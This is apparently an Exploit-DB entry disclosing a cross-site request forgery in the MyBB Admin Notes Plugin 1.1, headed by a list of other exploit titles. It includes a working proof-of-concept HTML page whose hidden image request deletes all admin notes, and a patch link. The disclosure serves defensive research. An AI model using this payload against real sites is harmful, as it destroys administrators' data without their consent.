1873a7d234
12 changes to exploits/shellcodes WhatsApp 2.18.31 - Memory Corruption Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation Libuser - roothelper Privilege Escalation (Metasploit) Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery VirtueMart 3.1.14 - Persistent Cross-Site Scripting Rockwell Scada System 27.011 - Cross-Site Scripting Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting
20 lines
No EOL
757 B
Text
20 lines
No EOL
757 B
Text
# Exploit Title: MyBB Admin Notes Plugin - CSRF
|
|
# Date: 2018-05-14
|
|
# Author: 0xB9
|
|
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
|
|
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1106
|
|
# Version: 1.1
|
|
# Tested on: Ubuntu 18.04
|
|
|
|
# 1. Description: The plugin allows administrators to save notes and display them in a list in the ACP. The CSRF allows an attacker to remotely delete all admin notes.
|
|
|
|
# 2. Proof of Concept:
|
|
<html>
|
|
<body>
|
|
<img style="display:none" src="http://localhost/mybb/admin/index.php?empty=table" alt="">
|
|
</body>
|
|
</html>
|
|
|
|
# 3. Solution:
|
|
# Update to the latest release
|
|
# Patch: https://github.com/vintagedaddyo/MyBB_Plugin-adminnotes/commit/3deae701cdd89753cb6688302aee5b93a72bc58b?diff=split |